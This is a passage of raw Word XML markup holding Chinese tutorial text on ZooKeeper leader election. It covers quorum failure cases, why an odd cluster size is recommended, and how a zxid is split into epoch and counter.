        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>所以只有两种情况无法选出</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRPr="00166F65" w:rsidRDefault="00166F65" w:rsidP="00166F65">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="00CB437C" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>整个集群只有</w:t>
      </w:r>
      <w:r w:rsidR="00CB437C" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00CB437C" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>台服务器（注意不是只剩</w:t>
      </w:r>
      <w:r w:rsidR="00CB437C" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00CB437C" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>台，而是集群的总节点数为</w:t>
      </w:r>
      <w:r w:rsidR="00CB437C" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00CB437C" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRPr="00166F65" w:rsidRDefault="00166F65" w:rsidP="00166F65">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="00CB437C" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>整个集群超过半数机器挂掉。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRPr="00166F65" w:rsidRDefault="00CB437C" w:rsidP="00CB437C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>所谓的</w:t>
      </w:r>
      <w:r w:rsidRPr="00283EAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>偶数问题其实是另一个集群优化配置问题</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>，即</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>集群的容灾数量</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>集群总节点数</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/2-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRPr="00166F65" w:rsidRDefault="00CB437C" w:rsidP="00CB437C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>假如集群有</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>节点，那么最多允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>个节点挂掉，如果有</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>节点挂了，那么整个集群的选举结果不会满足条件：集群中超过半数的机器拥护。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRPr="00166F65" w:rsidRDefault="00CB437C" w:rsidP="00CB437C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>假如集群有</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>个节点，那么最多也只能挂掉</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>台，因为挂了</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>台时，选举结果也不会满足条件</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>集群中超过半数的机器拥护。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRPr="00166F65" w:rsidRDefault="00CB437C" w:rsidP="00CB437C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>结果可以看出，多那一台用处并不大。所以集群总数推荐为奇数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0037224F" w:rsidRPr="00166F65" w:rsidRDefault="00B15A52" w:rsidP="00ED12D5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xid</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>由两部分组成：</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Epoch</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Counter</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>在我们实现中，</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>64-bit</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>数字。我们使用高</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>32-bits</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>表示</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">epoch, </w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>和低</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>32-bits</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>表示</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>counter</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>由两部分组成，所以可以将</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
